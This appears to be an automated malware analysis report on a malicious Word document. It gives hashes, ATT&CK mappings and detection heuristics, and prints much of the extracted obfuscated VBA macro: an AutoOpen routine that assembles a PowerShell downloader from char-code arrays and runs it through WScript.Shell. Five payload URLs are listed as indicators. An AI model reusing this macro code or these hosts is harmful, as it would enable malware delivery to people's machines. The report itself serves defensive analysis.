Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 2cdd2da9534a0467…

MALICIOUS

Office (OLE)

249.0 KB Created: 2018-07-04 23:09:00 Authoring application: Microsoft Office Word First seen: 2018-07-23
MD5: c0c25fcd749aa35978ea527ff3d38dcd SHA-1: a9592fa1db9676d34d7d2092540c1070d6a1b9e7 SHA-256: 2cdd2da9534a046741e4dd2ac64b3e993222e5d8a7a583ce720ef8571c1e1b38
290 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample contains VBA macros with critical firings for Shell() and WScript.Shell usage, indicating an attempt to execute arbitrary commands. The AutoOpen macro is present, suggesting automatic execution upon opening the document. The script likely downloads and executes a second-stage payload, though the specific URL is obfuscated.

Heuristics 10

  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
       cXluNp = kNrHKb - HsBiQ / 54517 * 19345 / 8617 / ZwUitQ / hpzjKv - LnwAM
nUOXansrijX = iiuqZRcz + CreateObject("Wscript.shell").Run(cuBiz + Chr(vbKeyP) + QDGOIEzQGIl + Chr(vbKeyO) + zqEUUQiHoE + rIbwszZlqGa, 819035469 - 819035469)
   wWhEA = PMNurv - lLWUpO / 84586 * 89025 / 90034 / pQilK / jIlPRk - lJuLwG
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
       cXluNp = kNrHKb - HsBiQ / 54517 * 19345 / 8617 / ZwUitQ / hpzjKv - LnwAM
nUOXansrijX = iiuqZRcz + CreateObject("Wscript.shell").Run(cuBiz + Chr(vbKeyP) + QDGOIEzQGIl + Chr(vbKeyO) + zqEUUQiHoE + rIbwszZlqGa, 819035469 - 819035469)
   wWhEA = PMNurv - lLWUpO / 84586 * 89025 / 90034 / pQilK / jIlPRk - lJuLwG
  • Payload URL decoded from an encoded PowerShell loader (5 URLs) high OLE_VBA_ENCODED_PS_DROPPER_URL
    A VBA macro assembles (from literals scattered across helper functions) a WScript.Shell command that runs a PowerShell stage-2 loader whose download URL is hidden in a numeric char-code array — decoded at runtime by [char]($_ -bxor k) (or +k / -k) after splitting on obfuscated delimiters. The decoded hosts (often an @-separated fallback list dropped to %TEMP% and executed) are the next-stage payload URLs, never contiguous on disk; surfaced as IOCs. Self-validating: only a transform yielding a valid host URL is reported.
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Attribute VB_Name = "qSGjGDEj"
Sub AutoOpen()
On Error Resume Next
  • Reference to Windows Script Host high SC_STR_WSCRIPT
    Reference to Windows Script Host
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://51wh.top/II1S3LEJ/ Referenced by macro
    • http://www.thingyapp.com/6nCqu9R8/Referenced by macro
    • http://www.lecreo.se/ZTAxFEDZxd/Referenced by macro
    • http://shop.69slam.sk/60nDON/Referenced by macro
    • http://www.tcbecybersecurity.com/H56uKcU/Referenced by macro
    • http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 20450 bytes
SHA-256: 1925f6b893840f14659af93545298247279857fc6fb17b1707e2e83f0de58155
Detection
ClamAV: No threats found
Obfuscation or payload: likely
425 of 734 identifiers look randomly generated (e.g. 'FtIXAochGNfl') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "FtIXAochGNfl"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "qSGjGDEj"
Sub AutoOpen()
On Error Resume Next
   olOUO = fJRMh - VAaOoc * JhXVti - TPaTT - 36309 - Fzrhd - 74981 * XjorMN
   jZwKAN = URQVpI - QjztOc * CijLp - mwidjR - 15338 - qiITFR - 72475 * bMniMG
   tJjVpI = TnkSX - RFECFT * EpwurE - oqNwpz - 46865 - UlGlL - 55719 * MCwpG
   vkIBsd = EKmikL - dancaE * lTvTH - mdwzB - 94801 - tGEuz - 38631 * zKzcAz
   uosDi = YDSFE - FOarj * zUUXY - FwMjH - 5149 - XwJiK - 41266 * jhjbw
   wPDfhc = wVMoX - YzkEo * PuhZvk - VLhQk - 85980 - iVpuj - 5352 * sMBlVH
   rzzkj = qPzKVE - jmpYA * aEoaJL - XGUXKf - 60966 - qfijYC - 99005 * JIkMP
   oWPiOj = DXoZFJ - vcApYX * GGrbva - fSZwNa - 34632 - HfRzDn - 16565 * HTsPTj
EYXBvZofK (JEIjVsWGz + YWzDPiWi + BEQDVsC + IOkqAzDLGFw)
   dKUwD = pojOi - szDzH * SKRkh - YjwkF - 82714 - iHjfv - 55560 * zSJGs
   FFGVH = MSQTjt - UXUXEj * EwQLUH - vGABK - 82826 - vTcbd - 47732 * qRnzlS
   zZzcvf = AQqIuR - wQFbv * kCIpXl - WhjnZ - 56661 - Yminp - 26277 * iFzmll
   uwwKa = KuRJE - MMTkC * RviLiR - hIGzJD - 73767 - vclkdz - 40192 * dUYji
End Sub

Function JEIjVsWGz()
On Error Resume Next
JfIOkH = 62545 * GncNQ / 59662 - btazz * 18451 - FViZb / pIKpRr - nWQRfz + 16787 - OERWB / 87026 - znHid - amfKjC * wcmwY
   dpSPJ = 5260 * fciYz / 29876 - irYts * 21685 - WqWKjm / QkjhzI - btVvw + 48829 - QEmNpv / 57943 - qbVnVH - wFcQRO * zrzGpG
   VYUGw = sOzlu / SObhTw * 67727 - wDJws * 93909 * PZhVlo / 13133 - zCvzTv / LlEzl * tjLLE - MSPVN - 98469
   DwvlOF = 72399 * wrqQpu / 9573 - LnKcz * 30975 - jHMZG / QiGXcm - ZCHBNM + 15696 - ZBYzsi / 72014 - iiBnj - iCjfn * IksNHb
mFAzrd = "wershell" + "        " + "         " + " -joIN" + " " + Chr(40) + " [C" + "haR[]]" + Chr(40) + " 24 ," + "75 , 76,8"
Vndzvw = 29529 * iCGAp / 66191 - znXJA * 93823 - VTNiG / imfFOm - EWjha + 25198 - kZBmc / 92990 - XHjtF - SSJjRq * brWAl
   ltuFlE = 54962 * VztdI / 64950 - OLmkDf * 57899 - SjTIjV / BdAEF - JEYIl + 15658 - DbWBu / 44615 - kSrPzH - bZSww * CwPdDc
   bFdJU = 95067 * AqRRD / 50516 - hIXimO * 80261 - jkGzw / YmSVzz - CWdnh + 55043 - kVOHFS / 68265 - FDJKNO - sDUAJ * EzvFcS
   EHObR = 45608 * XqJSN / 17263 - iillEw * 84776 - iGMpPU / MtzSB - cEQzbA + 92567 - PAinIU / 30891 - szidXc - OcImR * QVvHDF
qsoaQB = "8,1 ," + " 82 ,8" + "9 , 75" + ",17, 83" + ",94,86,8" + "9,95 ," + " 72,28 " + ",114 "
WifzTE = 44553 * mjpna / 71009 - uoErWw * 58283 - KGEnP / KfFicS - VSIQEE + 44036 - Quwqq / 85690 - lcTms - UtOQH * cAjEw
   CBrUoQ = 39004 * ACQGjd / 22789 - dmKjr * 37829 - bQcib / nuQIiX - kcvtvV + 48742 - ZOsNEB / 98225 - Ffmiq - DMlsG * IzwzG
   ZvbGq = 67799 * vRvRbB / 18605 - HiwLJF * 80456 - MwQjwa / DAAZWT - BtKRlB + 43235 - IPhjUM / 49825 - bwjJPJ - zqUZr * acmPL
   oArRl = 41318 * NBCjQW / 62535 - uKcwow * 37558 - iHCPM / ZQvHjM - IouRod + 28968 - dUVZY / 27459 - VASbVc - JjGiY * lnJqTq
UvmCduOZj = ", 89" + ",72 , " + "18, 10" + "7 , 8" + "9, 94" + " ,127" + " ,80,"
EhoUMn = 34870 * urwpn / 70965 - vSjMi * 46679 - hzRXK / zzTXMr - CuKvUt + 44218 - uDciCz / 9416 - sOwXBA - CodbDu * bcvsV
   irEaMz = 78150 * brlfP / 45161 - uaAri * 81240 - BmcimY / MMBuq - vCjdLE + 82431 - FRuDiE / 23642 - UOuAip - wdKQt * fjlZj
   IZWwa = 33222 * HIuLGw / 48908 - ptdPpZ * 30531 - ZtAzp / BjqAXi - wpCCs + 71308 - ZhIUh / 33999 - HGpIts - zCaTF * GNVGZ
   stXja = 98808 * wUifET / 91042 - smAqE * 10855 - izAozj / hJiwrU - wiTBjt + 94596 - wGwwr / 75228 - kifHHL - jmCSV * YAGcbi
ilXYfsrJEwZ = " 85 ,8" + "9 ,8" + "2, 72" + ", 7,2" + "4,127," + " 75, " + "70 ,1,2"
DCGAaV = 30433 * FWKDc / 68666 - PmmzL * 63024 - oTZrq / FFTBPv - wJpZnN + 9220 - uwstDG / 98118 - puIvpN - bjiiuz * InjlX
   jXkJwF = 79653 * uGWiI / 18558 - InMIKG * 58953 - XloNz / XwXXV - ZiDcw + 56908 - GbdnZO / 79766 - CpoBi - BNXKs * lWIwLn
   IoroB = 31228 * vpoHqs / 23257 - IQUqCE * 14583 - rSTrW / znKiDf - XHVlN + 87909 - zVkKi / 93637 - MbBTw - iAWhY * UpBzM
   AZkjM = 64242 * XttzO / 97031 - NVIiV * 75487 - XUfSDm / kTfcmG - lSGcUM + 57934 - Uavtj / 45577 - zPpzI - FERIvV * aOUcrT
PrvbVw = "7, 84 " + ",72 " + ", 72 ," + "76, 6,19" + " , 19 " + ",9, 13 ," + " 75, 84" + " , 18 " + ", 72" + " , 83" + " ,76,"
vwWwSr = 52037 * tWCkq / 42115 - iFGCU * 75594 - dfiBQ / jCvjDL - mrbsar + 69436 - BZYSn / 97269 - MoYjv - VqOQau * rbTjfp
   hhPETF = 33283 * WYRoX / 63855 - tJAFiq * 2754 - QmRzW / ZnZdj - vZfPRk + 91069 - plqFEj / 98673 - nvpGj - wRCFu * zlsLn
   zNKwb = 27784 * UhwmbG / 46383 - HHAIiW * 27141 - IiKzrp / MRitk - jJTaTS + 88819 - rHnbZA / 63042 - dojjXB - ROCfc * VsNnAX
   sTilnw = 90952 * WfwMv / 80221 - VAind * 33603 - bOMMpl / EtiRUn - aBHrLZ + 98076 - UqJFu / 53412 - OYKRSs - YbJJI * mSvaB
kVkcF = "19, 11" + "7,117 " + ", 13" + " ,111,15" + " ,112, 1" + "21, 118 " + ", 19, " + "124 , 84 " + ",72 "
TYPaEn = 65082 * vdmWw / 90752 - sMRnAd * 6691 - nGiHn / ZXTEMb - VFLXKF + 42093 - kBOEl / 79204 - vuKwQ - bTWfu * WFTSjT
   HfPSW = 94976 * QItBm / 13541 - EzhYDB * 65426 - oRYwq / jonRuw - psrsws + 42099 - rbtnd / 94606 - jVcPW - qzuYHf * UGkrKk
   niNcdD = 75436 * GJidiZ / 80484 - LWPvQ * 1308 - czzIf / FsnzR - iavDs + 96109 - kFizLB / 2489 - IKPtQ - QldfuH * AQujQ
   FpjHI = 23334 * zqiLN / 90024 - ERpfZE * 97358 - zTpNom / qCdsiw - pVGKit + 14419 - NtkBP / 78362 - LkfQKs - RvXYL * chUMhL
HqNIHRBkJSQ = ", 72 ,7" + "6,6 " + ",19 ,19," + "75, 75" + ",75,18" + ",72 ,8" + "4, 85 " + ", 82 ," + "91, 69" + " , 93, 76"
JEIjVsWGz = mFAzrd + qsoaQB + UvmCduOZj + ilXYfsrJEwZ + PrvbVw + kVkcF + HqNIHRBkJSQ
   hSzBZ = 56335 * qRZZb / 13482 - IZjZF * 300 - wIprj / CiAQK - QCoFTo + 30139 - BRZoEz / 19206 - JwOik - kKKJs * CMQJP
   RnuZn = 54611 * UWlRW / 88925 - jYKKcF * 75855 - XHtiAl / tPIaMn - wwhfWK + 95829 - FDwmwM / 20601 - qNllPn - FbVfdV * wiHtZ
   XGGPq = 45415 * tCETDB / 81292 - cZtOL * 50245 - mosPiz / Rjfki - ApiUa + 67061 - ZPDbt / 70551 - ctYVI - iURXas * hkVnSS
   cwidi = 83723 * pjOmb / 66948 - SMaCZL * 36649 - EAiUKz / QfEnw - tfHCY + 72258 - WNjEuj / 81042 - HFUOsB - izNjEi * jiokk
End Function
Function YWzDPiWi()
On Error Resume Next
BPSNLJ = 2143 * QlUYH / 98600 - swYjLj * 17457 - hSBjb / BADbMS - SiGzI + 59015 - mfujz / 25434 - wiaits - lvKaZw * lRzuj
   UWrhSL = 7065 * nmVjwo / 14229 - MJizRb * 80858 - UPcGjK / OHMslr - itmlSB + 50814 - NpMmzR / 51994 - NtjzM - izFcE * bkvWw
   qWUTQk = 80884 * zijBn / 67869 - sUCBjN * 85296 - ivKvt / oBPYbH - qphioj + 48896 - aJWJY / 19491 - NIjPzF - YGowLK * UcLbJC
   ioNjIo = 34172 * BntuLP / 75783 - zwErU * 52060 - pfpwT / dtqnV - mphksh + 38219 - vDKRp / 38218 - kwRHJ - dXASr * sYtDHq
BkmCvQla = ", 76," + " 18, 95,8" + "3 ,81 ," + " 19 ,10" + ", 82" + " ,127," + "77 , " + "73 , 5, 1" + "10 ," + " 4 , 19,1" + "24, 84 ,"
zDZWD = 90070 * MHAZZz / 74066 - CQhWJJ * 42494 - riWvh / IPUYm - hjYZwr + 78345 - srBzK / 73954 - FwMlz - iinjwG * wkFAM
   aqWJm = 41094 * iozOEj / 46806 - olazNN * 44852 - GqfGT / ovzPZk - nGBfz + 51654 - uMRfwm / 19362 - MdPDCc - SGOLh * CQpGna
   ZOSjD = 8658 * fBXRjO / 94045 - VdwTa * 14572 - mwWiiw / OzoSo - iMrbo + 92025 - jYsqK / 98280 - PnAbF - sbVMU * winad
   fZRPm = 89409 * uZzKj / 76315 - iUzVhf * 46443 - uQltds / cZILJN - LARIJV + 86462 - DitDT / 92825 - lGvcri - dsRaw * aCViiu
vlFIatq = " 72 , 7" + "2 ,76 " + ", 6 ," + "19,1" + "9,75, 75" + " , 75, 1" + "8 ,80" + ", 89, 9" + "5,78 " + ", 89, 8" + "3 , 18 ,7"
ivwLUT = 53173 * okbJB / 46339 - LnaQN * 34775 - kCWwz / GlCmQ - XzVufw + 41048 - LkhhEr / 34707 - hBoXOF - vpXUI * DhosLA
   iVUIkE = 31552 * hkZTdp / 79642 - NhbHHY * 22096 - nCYTaa / wnFobt - zzGci + 82975 - YwkYt / 42561 - nOiFJi - ijwDH * dfXBOt
   GVrIZS = 40459 * jAhWlu / 2094 - SInnN * 4763 - kszldY / mAmOf - NonSid + 95905 - GKNLKv / 34961 - NZhEXG - bhrbZ * jjWOW
   jcBiqU = 57058 * DovjE / 2178 - ZXiRL * 91715 - TKYaz / tajKAZ - LNDOp + 9560 - irBWC / 85730 - FASwi - UIqGP * wVcFk
HcOWhM = "9,89 ," + "19 ,1" + "02 ," + "104 ," + " 125," + " 68," + " 122 ,"
VsjjY = 65089 * HZwwh / 77145 - BkRCUV * 63298 - aabih / QLRMIw - kuilz + 12943 - cUPwzs / 32587 - UvuMX - RIHtA * rNhmZr
   UOtaNC = 47820 * zEdREu / 17109 - CpIJp * 66118 - TkzKo / zAfwS - knPmh + 18248 - QjJVbT / 91318 - aKrHAl - ZqOsk * BEzVl
   ptvRs = 80838 * zVosH / 1248 - DAwsb * 34389 - ZFIiMc / Dspsr - woGXf + 47337 - KaAfMI / 64657 - hqzkiU - ommfN * wczzQ
   YhmDbz = 94099 * RKPXr / 86829 - XqopRb * 43096 - ZXpZi / fLApm - toHQH + 7114 - zPbqB / 82843 - iOJfUF - TNfla * DlwPi
mThoHWizps = "121, 120," + " 102," + "68 ," + " 88 " + ", 19" + ",124" + ",84 ," + " 72,72, 7" + "6 , 6,19"
jECNj = 91505 * uzNzU / 62558 - Jwjnu * 75674 - waXVQR / wjamJu - VuBOW + 9142 - vqMujV / 21661 - ndYRFm - isPdhv * mKLlq
   swkOGq = 86598 * lULrcI / 90180 - nzbTEz * 26777 - ctNZm / obPUc - idsMWw + 75325 - RnqaJ / 75338 - Vsomt - YlNcTr * jkcHfN
   RpmRW = 27802 * tFLdjp / 38382 - qVRvYV * 35378 - XrzdGO / cYGfzd - iYwoGL + 93221 - NLIuXL / 40264 - SrzCPZ - kciSi * aJUTI
   KGOzI = 23492 * upDmQz / 59765 - jaijw * 19234 - fkCECi / KivwiM - drdhk + 57524 - JqDrFN / 1073 - ZwPuS - duDJPN * UrTRSE
VFDRKWvkQb = ",19 " + ", 79, " + "84 ,83" + " , 76 , " + "18 , " + "10 ," + "5 ,79" + " ,80 , 93" + " , 81 , " + "18 ,79,"
VHAXA = 14815 * OMbVD / 14072 - OhWfIk * 4204 - zASuFw / wBNiL - wTjZT + 38271 - Fjkjl / 78805 - DGIMvK - IzFGBT * PaIVvh
   wuzwp = 36269 * TzLME / 31149 - TZAkfW * 44816 - PNJbs / zXizk - zQAqh + 12974 - rcKTE / 51958 - whQELp - kijnOa * WbjNUG
   DfYXiQ = 2351 * LajwdG / 92827 - NsofrQ * 16044 - sXofDB / viWoHF - ipluT + 35347 - hDpTqw / 36669 - KznXZi - bVjJr * SGRorM
   DZJCY = 6800 * lFuEAC / 31994 - HZnuW * 25465 - QDSfXV / dFjUp - IGCnmG + 98100 - piOYf / 12538 - Haajn - IGksj * kcoVf
IYjOEKOwQzN = "87 ,1" + "9 , 10, " + "12, 82 ," + "120 " + ", 115, 11" + "4 ,1" + "9 ,12" + "4 ,84" + " , 72 ," + " 72 ,7"
kFvGj = 91437 * pqUaF / 94889 - QHqwj * 54047 - ndiRtz / UzJTV - ACdcKN + 36369 - acsfpV / 94478 - jVFhp - cQonwf * rLHjR
   WqiHT = 2239 * jKVji / 71143 - ZVcvu * 10796 - KQzPdk / zsfbvS - qcaaM + 45542 - wQsjS / 32426 - SwWOQZ - ajrqR * mSqEn
   NmFpQ = 56173 * TPmIQ / 2936 - qsAmB * 37574 - TdTRAZ / GcKqHf - TCWfhS + 78693 - TzkRoY / 63979 - iuNZt - mYPDi * nbSIW
   PisBU = 65608 * lLzFiK / 36934 - itINit * 80918 - vjkvw / jZntA - EZzCj + 67125 - AabIfz / 69973 - ZirJY - RwSkm * NfaRpJ
vuBTwSTGJS = "6 , 6 ," + "19,19 , " + "75 ," + " 75 ," + " 75 ,18" + ", 72 " + ", 95, 9" + "4 , 89 ," + " 95 , 6" + "9, 94" + " , 89" + " ,78 , 79"
YWzDPiWi = BkmCvQla + vlFIatq + HcOWhM + mThoHWizps + VFDRKWvkQb + IYjOEKOwQzN + vuBTwSTGJS
   GLMNrn = 76703 * DFZqE / 60579 - quzUVZ * 1090 - ZRuvKp / fWBLGO - MBHYa + 22413 - wZqTl / 29955 - uRPWG - mwzrd * LaDotZ
   EiPuTw = 66297 * nwkpIt / 83824 - wwtcvT * 58283 - RHqcL / zIVjS - jfqpj + 76056 - GlpUqJ / 82893 - WAawlz - cMIFb * AbUbbb
   OiOmW = 17685 * MBmmDd / 55493 - PoNnqD * 49803 - oWRnO / QlvYIi - VjjYwk + 51970 - BjSCYb / 44404 - vaJoRZ - FWick * qfVuC
   SHEtI = 83475 * QcmAS / 38371 - aIuij * 30702 - DihdM / GKUsOh - PPwhq + 88247 - vAZHmH / 25343 - TZtuL - OdWQvw * GHulk
End Function
Function BEQDVsC()
On Error Resume Next
KULBiS = 25943 * WNEMhM / 61507 - MNocrA * 45656 - EzZsS / VfaMw - lnFMO + 4197 - jJwzU / 90285 - YVSusK - szjsVX * sZlUN
   zVSidL = 23104 * zqjUI / 86995 - tUqQMD * 16578 - NdvYz / hwPfBz - lqzEGi + 93549 - bTIrW / 23982 - Pdnkq - EFimO * RrRoG
   jizMz = 99081 * OdrDbZ / 49272 - kEmpzo * 39445 - EPuqA / slztTf - wFRWRL + 18095 - tPEJj / 80093 - BDZdPS - wDIoQk * GhFtA
   DIdqLG = 40700 * BlJmh / 51826 - UjmsRJ * 47250 - lRSrJi / KfBwT - jYRhP + 59244 - SwvEn / 95166 - Iiwpki - rYtOLh * adljHW
SboWa = ", 89 ,95" + " ,73,78,8" + "5, 72" + " , 69" + ", 18 , 95" + ", 83 , 8" + "1 , 19 ,"
QlzQmN = 1170 * YHYUY / 64486 - NVQhhH * 37366 - iRcozR / SsISS - ktlmA + 89661 - XGXIOu / 35303 - qjJTw - OwJZCD * ojLFP
   SwkkEK = 20216 * wMQba / 89685 - YzAPLa * 89446 - jTnjfU / Qfvfn - hXkiOK + 16288 - izPZGz / 85128 - ohKXzA - Qifsj * ljuGOr
   zYIcN = 80347 * rIFzEz / 44040 - zNjToN * 86374 - YTsiqo / NiHZzA - qjDMF + 68850 - jnYAbs / 23172 - BZHEh - IULHCX * SzXZkm
   AQbIJ = 98025 * fUdOwY / 16574 - hRtSih * 21821 - FDLzQp / bqGpE - zzvitd + 700 - sGzjoP / 11536 - RIopYW - zzZpT * YqjEt
qTNkA = "116 ,9" + ", 10 ,73 " + ", 11" + "9 ,95 ," + " 105 , 1" + "9 , 27 ," + " 18 , 1" + "11 ,7" + "6, 8" + "0, 85" + ", 72 , 20"
MnENKA = (DJMwI + kVltA / fLjrw / 91691 - (tEzlP + ncliiI * iqIazk * YDTCwZ + SccvGR + HwFYzR))
   NnssV = (LGjKXL + qkGBiw / mBGuSi / 74617 - (PGhYX + Dftrh * kcpJmQ * RmVGft + jLhza + pnradw))
   dbivjM = (bcuTZD + vcLwzV / WvbNz / 81986 - (jaLCzH + wLlcGW * mEpzz * IMUNG + VGfDhj + ksBiR))
   vKwQa = (szHjr + NzmhXF / vFliTI / 7409 - (klRkVY + EtLvur * uOWoR * mjDVw + WTJbdI + cHNpz))
jzaBPO = " , 27, 1" + "24 ,27, " + "21 ,7,24" + ",120 ," + " 104," + " 117," + " 28, " + "1, 28" + ", 27," + "10 ,4 ,11" + ",27 ,7,"
RhNavk = (DTtOl + cWurFb / MMbwNN / 13433 - (zvzuqr + JvVII * sJtlz * ZAKQL + riFFQM + dkEXtU))
   LBdTjI = (bXdEGv + YRtfH / KLQVR / 24893 - (nKUpI + OwwVII * DRwim * qJvEtt + cmAkHB + EIRCo))
   ZwqDk = (XpDJs + Gsqkv / pEUzJj / 53595 - (DXrCCC + TzFcw * VDdZT * sKAQO + lHMAa + HbtAAz))
   Hqtnt = (HwYTAr + pjjjCG / sQuHTY / 31139 - (XUUDf + MMzXH * GOMoLI * zbsMw + TIqvmT + VmYDz))
zvuFL = " 24 ,10" + "4, 83" + ", 101 " + ",1, 2" + "4 , 8" + "9 , 82, 7" + "4,6 , 72" + " , 89 ,81" + ", 76 , " + "23,27" + ", 96 ,2" + "7 ,23,"
LSZiVZ = (AWLMw + WWVNn / Jjcfv / 71404 - (lwpDK + mMQqo * wmaYCM * swYLT + GXdwi + itznRL))
   itOYB = (jljMWq + MFwiH / iWMwf / 67739 - (FlzFB + Qbrjj * kFRYpc * NGRLq + YYVqS + iphuzm))
   sEMwWz = (ZUCiL + phlpi / SwISEi / 17028 - (imnlzQ + fUnLu * ISOCW * zrwzP + FBwjmI + NVnnh))
   iuKJM = (dkYJfu + hZLji / XstOHw / 66523 - (rjtVfj + nLmijC * JhsQpW * uCmEBJ + pfDNi + mDfoA))
pbaiZriB = " 24, " + "120 ,10" + "4,117 " + ",23, " + "27,18 " + ", 89,6" + "8, 8" + "9 , " + "27,7, "
JNOpqI = (zjrIjM + jzAIhb / simdS / 9538 - (dhzOF + PZEKi * FOjSZj * kWftI + IORfcM + DVWzr))
   tjIXz = (wrFRSF + mZzJII / jZTYT / 35266 - (hiViI + UwioWI * QYqHZn * zYAtO + JiTQj + itRJk))
   AsMKF = (hlrniI + TmtcMm / jDwIP / 65654 - (JiwzJ + iLQfm * flhPk * nITrAV + fpjzwD + XcXDso))
   vrHWN = (tGkCoL + bZjSh / YdXzOT / 53156 - (vCNiWw + sQMVm * jYFjJk * SztFWP + vYrsC + wwDWYR))
oTQMGkTXmMr = "90,83," + " 78,89 " + ",93 , " + "95,84 " + ", 20 " + ", 24 "
mzckj = (aiWGjf + IHQwnS / SmFPq / 52454 - (qVAFvA + XzNiw * NrGEpL * XdUGz + RFAsNt + AkNWB))
   Ccwoq = (FAhQD + RRNwC / dziMbS / 5438 - (NTzCs + QohdO * FGqzjr * vqOji + adLYqB + lkFlDf))
   dnkHuq = (pVGJPM + OUvzoq / zKwtcw / 19437 - (krkafG + zPlCi * nHHPPT * jZZKA + jcmNS + QBkOZo))
   nzVjMl = (zJCqd + iAELS / aYZoN / 2469 - (KSlCt + ajfMOs * YsHWZ * kFNPwZ + zOINJH + tbqOGJ))
QduLBiscNK = ",111, 10" + "5 , 118, " + "28,85 , 8" + "2 , 28 ," + " 24 , 1" + "27, 75 ,"
YaWXED = (dFqbS + jChjsA / YBVzf / 9220 - (ImGtN + wSVfB * AJMvA * vdOCNi + zGDWF + szwJr))
   ZDiUB = (wqbmm + mHjLa / mlZawj / 10139 - (FjOCL + shEOh * mLTaq * CYQEcq + qSNcw + vOswN))
   iQlJCU = (VBbjAa + JKMAtH / iNWFA / 69922 - (wddkCA + BlUSmG * QdUrm * zpXNc + ivCODB + EYXzwz))
   zHYsi = (BtSjC + OVoHF / HIWlz / 44690 - (QCBrs + YuMRrQ * iVskdS * pnPQR + hooDM + BbSFz))
JHwAMmCO = " 70, 21 " + ", 71," + "72, 78 ," + " 69 " + ", 71,2" + "4 , 75 " + ", 76 , " + "88,18,"
MoMSU = (FbDawL + CmMvR / ifHlc / 17732 - (ItaIk + SLlNJ * KVdFzw * jzLZt + TiBaE + jIElM))
   dCXOA = (MhjsTU + DTmSLI / vPJVz / 76892 - (BwjNNI + rBRXF * SVRwRz * WGiPj + AYOsBO + GKlzf))
   wOLARh = (ffAzL + VGjar / YYtPA / 89426 - (QGIMCA + zDckd * UMCUwJ * QjSJYH + TZDwL + VRuWT))
   wrIRiz = (tlLWYT + Cfjozn / wAXziY / 44868 - (DRfBwN + HSnJb * RHDff * DplGW + CzqlSA + aRiuqX))
nVrDzLzWz = " 120 " + ", 83 , " + "75, 82, " + "80 , " + "83 , 9" + "3 , 88," + "122,85 ,8" + "0 , 89,2" + "0 ,2" + "4 ,111 ,1" + "05 , 118"
BEQDVsC = SboWa + qTNkA + jzaBPO + zvuFL + pbaiZriB + oTQMGkTXmMr + QduLBiscNK + JHwAMmCO + nVrDzLzWz
   plOHIO = (isBHMU + njvODC / sNKbI / 34785 - (pSJjj + hDzEWN * kitaD * SbNww + XrwYE + zwRoas))
   RsidCr = (zEzMHG + IwHfLQ / WKSnD / 55332 - (HtfnPQ + trzQi * KUCGSW * MLickO + uiPqw + wsLSZ))
   vqist = (ZDGHw + aJnMc / zThsQ / 79791 - (kjKZf + jRECI * oEuzqI * fAAvO + jmotT + apaIk))
   dbBPi = (HiboN + TqjDJ / jlwDw / 36461 - (YkziwN + JlNjLQ * injvs * mZcTW + JZzSad + UKlIwf))
End Function
Function IOkqAzDLGFw()
On Error Resume Next
twQKiu = (iDJGXj + LtrMKj / jcBSq / 36983 - (NDbViE + LkLjI * KbWfi * KvFSP + bNMTP + obGRAi))
   ScauX = (crlFF + iYIvr / NrJOi / 37952 - (NYNkGM + mUtNz * NDkli * IBVLDE + fjlBDu + zKcPH))
   fuzkl = (spwPNU + XmzocV / UJjkf / 87147 - (WQnwE + CYbSr * FEZYbi * UINwc + FjDVL + EsTWZ))
   TJTjz = (hzAPI + kHBbYP / TKkwU / 99365 - (QEmim + ANHZjn * DPfLq * HkDMd + ENFAj + zhwtc))
qLiRaXi = ", 16" + ", 28,24,1" + "04 ," + " 83," + "101 ,21," + " 7 ,111,7"
pvwPsL = (AfapRa + iIzpOz / fpwIGv / 11989 - (jCZPz + KwkOX * zEwHVV * KQdziQ + JFBGl + YvzYP))
   IhJTYb = (luXREI + LvkZip / LvNpj / 5096 - (wzIcP + tvDZu * JrWdmE * uAHjK + kXwmw + oYcpwO))
   tbfzJf = (BZGFFW + TJvHkL / CqssU / 39827 - (hztbnt + vfvwni * BHHOt * VSLJP + UqlmH + KpUaMd))
   cDXdz = (zdNBj + dbSVPo / MQYuKs / 77943 - (dsibu + wRwzoL * RtHpBB * NsTEmc + BDJNl + CUkiZ))
fmofBMsr = "2, 93,78 " + ", 72" + ",17,108," + "78 , 83,9" + "5 ,8" + "9 ,79,7" + "9,28, 2" + "4 ,104 ,8" + "3,101,7 " + ",94 ,7" + "8, 89" + ",93, 87"
JPDVb = (nJzorv + CvcmQ / hzUwDl / 6443 - (ssOIpw + YhivBE * jTKJI * jZdXz + dSpSAk + KvQif))
   GwUMUO = (dDKuK + KBEBI / LnDbl / 84408 - (EtWsr + uEoaON * ZXvIGi * lRcuLs + wADXj + GKOGK))
   dWUMP = (qRcasp + kDvpDC / wkFEud / 56452 - (HEFYs + sWqEN * szkjN * SANcG + VXEsQQ + lwiJX))
   UzUsh = (lpdwz + VriKc / fwJCUO / 99101 - (amccK + MOsOwH * XVGsZE * vYiaUn + ZLRdGt + iwNAoJ))
